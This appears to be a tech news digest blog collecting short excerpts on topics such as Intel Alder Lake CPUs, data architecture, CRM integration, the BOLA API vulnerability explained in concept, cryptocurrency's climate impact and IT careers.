Upgrading to Intel 12th-gen Alder Lake: Motherboard, cooler, and more

For performance, you have three options: The Core i9-12900K, Core i7-12700K, or Core i5-12600K. They scale down in performance and price, with the top chip sporting 16 cores for around $600 and the bottom 10 cores for around $300. All three chips are unlocked for overclocking, so you can push them beyond the rated clock speed. The KF-series processors are identical to their K-series counterparts. They come with the same number of cores, same boost clock, and same power limit. The only difference is that KF-series processors don’t include integrated graphics. All of these processors pair best with a discrete graphics card, so you can save a little bit of money by going with the KF-series model. If you’re focused on gaming, we recommend the Core i5-12600K most. It’s the best gaming processor you can buy right now, sporting a massive core count and solid clock speeds for a reasonable price. The Core i9-12900K is overkill for gaming, but its extra cores are excellent for content creation, as you can read in our Core i9-12900K review.


Why Pulsar Beats Kafka for a Scalable, Distributed Data Architecture

Software developers today prefer to work with open source. Open source makes it easier for developers to look at their components and use the right ones for their projects. Using a modular, flexible, open architecture not only enables the right mix of best-of-breed tools as the business – and the technology – evolves; it also simplifies the ability to scale. By taking a fully open source approach, developers can support their business goals more easily. In fact, companies using an open source software data stack are two times more likely to attribute more than 20 percent of their revenue to data and analytics, according to a recent research report by DataStax. When your developers have the option of using open source projects, they will pick the project that they think is best. This can lead to the issue of creating a level of consistency and cohesiveness in your data stack. Without some consistency of approach, managing the implementation will get harder as you scale. Building on the same set of platforms that carry out their work in the same way can lessen the overhead.


What Are CRM Integrations? Everything You Need To Know

A CRM system reaches its full potential when it’s connected with other applications and software. “CRM integration” is the act of connecting a CRM system with other systems, and simply means that a business’s customer data can be seamlessly integrated with third-party systems. These third-party systems might be unrelated to the CRM system, but the data they generate or use can make CRM work better, and vice versa. Integration will look quite different for different types of businesses. For some, it’s as simple as linking a CRM system with a few functions of a company website, which can be done via integrations already built into CRM software. However, more complex businesses will need to integrate a CRM platform with a variety of other systems, including ones that are equally or more complex, such as an ERP (enterprise resource planning) system. Most CRM system integrations require connecting through APIs (application programming interfaces). A tool called “integration platform as a service” (iPaaS) that facilitates information sharing between third-party systems has become common for performing CRM integrations.


Leveraging social media background checks to balance friction and risk

Partly driving this trend is new legislation such as PSD2, the EU directive that mandates stronger fraud prevention checks to complete payments. Coming into full effect on 14 September 2019, the anti-fraud aspect of PSD2 is essentially equivalent to hitting every new shopper with a hardcore 3DS2 check, requiring more than one point of authentication from shoppers in a fashion similar to multi-factor authentication practices. What is now the established approach to deterring fraudsters at checkout relies on biometrics to verify users, including selfies combined with scans of ID documents, as well as voice, fingerprints and other data elements. For instance, we have seen such measures adopted by popular players in the fintech landscape, such as Revolut and the recently rebranded Wise. While, according to Visa, consumers have taken well to biometrics, with 61% finding them easier and 70% finding them faster than passwords in the context of payments and banking, their applications vary considerably, from a quick scan to time-consuming multi-layered requests that might even require the shopper to switch devices.


Quantum computing skills are hard to find. Here's how companies are tackling the shortage

Quantum computers operate on inherently different principles to classical computers, requiring a new approach to problem-solving and a workforce consisting of academic, technical, and businesses expertise. No one candidate is going to possess all of these. "It involves so many different skills: we need classical hardware engineers, we need software engineers, we need mathematicians, we need simulation and modelling experts," says Edmondson. "I think the challenge for us is, if we go to hire a classical engineer, they don't have the physics background; if we hire a physicist, they're not used to working with classical hardware engineering – analogue design is new to them." Another fundamental challenge for businesses is getting people interested in technical fields to begin with. Not only are fewer young people taking IT and STEM-related subjects at school, but research also suggests that younger generations aren't all too confident about their chances of landing a career in tech either.


In-person and hybrid meeting strategies in the COVID era

It is a mess. And it's not likely to change anytime soon. Business leadership has to plan as if this level of disruption will remain the new normal for the foreseeable future, because it probably will. In that context, how do we do meetings? Sure, we had the answer back at the beginning of COVID: We all just used Zoom or Teams. But now? Now we have some people in the office and some at home, and we still have to sync up and work through business challenges. Let's start with conference rooms. As it turns out, crammed conference room meetings weren't as prevalent as we may remember. Office planning company Density Inc. did some really interesting polling back in 2019, before the pandemic hit. Density found that, 76% of the time, conference rooms were used by four people or fewer. In fact, 36% of the time, conference rooms were used by just one person. I'm guilty of that. During my years working in an office, I camped out in a conference room as much as possible. My cube was noisy and there were constant drop-ins, but if I moved to a conference room, I could get some peace and quiet and get my writing or research done.


Pace of Cybercrime Evolution Is Accelerating, Europol Warns

Unfortunately, the cybercrime-as-a-service ecosystem makes a number of malicious services and tools available for easy access - including the ability to access call centers, as not just cryptocurrency scammers but also ransomware operations continue to do to attack or contact victims. Budding criminals, who may not have deep technical knowledge, can also purchase ready-to-use strains of ransomware and other malware, tap bulletproof hosting sites or rent botnets to aid their attacks, and seek guidance via cybercrime forums. To combat this, Europol notes that law enforcement agencies continue to target so-called "gray infrastructure," referring to services that are marketed by criminals to other criminals. "Gray infrastructure services include bulletproof hosters, rogue cryptocurrency exchanges and VPNs that provide safe havens for criminals," Europol says. While such services cannot always be disrupted, police have continued to do so on numerous occasions.



Quote for the day:

"If you fuel your journey on the opinions of others, you are going to run out of gas." -- Steve Maraboli

Daily Tech Digest - November 12, 2021

Cryptocurrency's Climate Impact: What's Really Being Done About It?

The cryptomining picture continues to shift. In September 2021 China banned cryptocurrencies as well as all mining operations. China had been the top miner of digital coins -- with an array of companies operating in the space. The Chinese government cited a lack of transparency and anonymity in cryptocurrencies as primary reasons for the ban. Immediately, many of the miners began moving operations out of China, and now the US has emerged as the world’s top cryptomining country. But Mora says that operations are also flourishing in developing nations with few environmental controls and near-zero regulation. While cryptomining can conceivably be located anywhere -- including adjacent to sustainable energy sources such as a wind farm or hydroelectric facility -- this isn’t typically the case. “There is a clear pattern of cryptomining pairing with coal,” he states. Meanwhile, the cryptomining industry says it is taking major steps to reduce the footprint of cryptocurrencies and introduce green mining methods.


A Deep Dive On The Most Critical API Vulnerability — BOLA

Because one user can have multiple objects from the same resource (e.g. trip), some API endpoints need to know which object (e.g. a specific trip) the user is willing to access. This is where the object ID comes into the picture. The client basically sends the object ID that the user needs to access. For example, if a user had a great trip with a driver, he can choose the specific trip on the “trip history” view on the application, and add a tip to the trip. Then the mobile client will trigger an API call to “/api/trips/<trip_id>/add_tip” with the ID of the chosen trip. Modern applications handle many resources and expose many endpoints to access them. Hence, modern APIs expose many object IDs. Those IDs are an integral part of the REST standard and modern applications. Exposing an object via its ID might be a good software design practice, but once the client can specify the ID, it opens a door to a very dangerous vulnerability — BOLA. In BOLA, a user accesses objects that he should not have access to by manipulating the IDs.


How Critical Event Management can ensure resilience in a hybrid world

While threats are always changing, it is becoming increasingly difficult to predict and respond to crises. In such unpredictable circumstances, a detailed emergency plan is vital for business continuity. Critical events can arise in any line of business and spread quickly throughout the entire organisation. With a good CEM strategy, organisations will be able to avoid this as the programme will be integrated across all business sectors and provide intelligence to analyse any potential threats and their impact. Not only will this enable effective, interdepartmental communications, but teams will have a more dynamic and consolidated view of threats. The automated functionality of CEM will assess and respond to threats and capture any valuable information for critical event reporting. This will contribute toward greater operational efficiency, reduced costs and better situational awareness and response visibility across the whole enterprise. When it comes to the evolving threat landscape, Critical Event Management can provide valuable security and assurance for organisations.


As technology pervades, CIOs’ influence on business strategy grows

While CIOs continue to deliver the core IT services that power day-to-day business operations, they are also often expected to help drive innovation and business growth. Many surveyed CIOs emphasized the importance of data and automation to break down siloes and create new value streams. ... Hybrid cloud is a key underpinning for AI-powered intelligent workflows. The number of CIOs surveyed reporting high maturity in their hybrid cloud operations increased 700% compared to 2019. The IBV’s recent study on cloud transformation provides further insight on how hybrid cloud is becoming the dominant IT architecture. Many CIOs are also looking to use technology to drive progress against corporate objectives like sustainability. 42% of CIOs surveyed expect technology to have a significant impact on sustainability in the next three years – highest of all areas of impact. ... The consequences of this disconnect can be significant – if CIOs and CTOs are using data and AI for different use cases without coordination across culture, processes and tools, the organization may lack a cross-company view and ability to govern critical data properly.


Handling Missing data in Machine Learning

There are a variety of reasons that may lead to missing data, such as data corruption, lack of data availability during certain time periods, or bias in the data collection process (e.g. certain categories of respondents in a survey leave an answer blank). The important distinction to make here is whether or not your missing data is occurring at random. There are three categories of scenarios for missing data: Missing completely at random (MCAR) - The probability of data being missing is equal for all possible data points. Missing at random (MAR) -  The probability of data being missing is not equal across all data points, but within known classes of data, the probability of missing data is equal. For example, the probability of data being missing could be equal only within responses from a given country. Missing not at random (MNAR) - The probability of data being missing is not equal across all data points, and there is no known grouping of data within which missing data is equally probable.


Nvidia intros AI Omniverse Avatar generator for enterprises

"As more enterprises deploy and manage hundreds and thousands of models in production, accelerated infrastructures like Triton will be crucial in maximizing throughput, minimizing latency and accelerating deployment velocity," he said. The new inference feature set includes new models and an analyzer to help enterprises understand how to optimize their AI models to run on a variety of different platforms. The analyzer searches the areas between all the different GPUs and CPU options as well as all the different concurrency paths, and meets the required latency for picking the right model, said Ian Buck, general manager at Nvidia, during a media briefing. "The right accuracy, the right amount of batching and the right hardware platform to get the maximum performance out of your infrastructure," he said. The new version of Triton also supports multi-GPU multi-node inference and forced inference library, also known as RAPIDS FIL. RAPIDS FIL is a new back end for GPU or CPU inferencing of decision tree models. 


Cut me some Slack: the poor data practices threatening modern business

Remote working has heralded many benefits in terms of productivity for office workers across the country and these benefits are likely here to stay, with the Department for Business, Energy & Industrial Strategy consulting about making flexible working the default. But there have also been some drawbacks to remote working for businesses navigating these new waters. As personal and corporate worlds collide, many organisations may find that their data is at risk of being shared on unsecured networks and on unofficial communications channels. And no organisation is shielded from this danger. A former national security official recently spoke candidly about UK senior ministers not following policy, and opening sensitive government data to cyber-attacks. This comes two years after suspected Russian cybercriminals stole the entire cache of messages from a former cabinet minister’s email account. Communication weaknesses, across all levels of seniority, is a real cause for concern, especially when valuable information is at stake. 


The 10 Commandments for Designing a Data Science Project

Understand that defining a problem and obtaining data does not mean that the problem can be solved. Think about current solutions, what kind of data you have, and the desired result. Could a human solve this problem using the same data given infinite time? If not, it’s likely that the problem can’t be solved using machine learning. When in doubt, consult a colleague. In the financial world, account balance prediction is an oft-requested solution, but no person or computer could tell you what your finances will be like over the coming months. Think of when the pandemic hit; millions of people unexpectedly lost their jobs. What about when there’s a house burglary and items need to be replaced? These are things that neither a human nor an algorithm can predict. The ultimate goal of any problem is to satisfy the needs of the end user by providing an appropriate solution that reduces their workload. By knowing what the end user currently has and what they lack, you can aim towards the best solution from the get-go. 


4 Strategies to Manage Freelancers with In-House Dev Teams

Freelancers and remote workers are often less exposed to the wider business context in which they are developing products and features. This can make it harder to assess and optimize their output from the viewpoint of an end user. Just as importantly, it can make it less clear what the other members of the team are working on and how their output affects their colleagues’ work. “Without consistent feedback, even the most talented developers in a team can invest a lot of time in a non-feasible solution. An ongoing feedback loop is one of the best ways to support a team and enable them to put their skills to use,” said Irene Avdus, a product manager at TextMagic, which has offices in multiple countries and which regularly brings on freelance talent. Giving freelancers and remote workers consistent and regular feedback doesn’t just help them improve their output for a better end result. It also helps them to fit in with the workflow of the rest of the team, enabling the project to go more smoothly for everyone.


IT careers: 5 steps to get hired before the holidays

The most common mistake people make is using one resume to apply for different roles. This is like wearing your workout gear for everything you do, from hiking to attending board meetings and even weddings. You may be more comfortable and it’s certainly easier, but it doesn’t make sense, and others won’t take you seriously. Similarly, you need different versions of your resume based on the different jobs you want to apply for. For example, a marketing position will need a different resume than a sales position. Highlight the skills and experiences most relevant to the role. Limit your resume to one page (two at the most). Recruiters and managers spend less than 30 seconds skimming resumes, and the shorter and more relevant yours is, the better your chances of grabbing their attention. Add keywords specific to the roles you are applying for in your resume. Hiring managers look for these specific terms to ensure candidates are the right fit. One way to find relevant keywords is to search for existing job descriptions that are similar to the position you want. Finally, versioning may help you keep track of which resume you sent to which job.



Quote for the day:

"Real leadership is being the person others will gladly and confidently follow." -- John C. Maxwell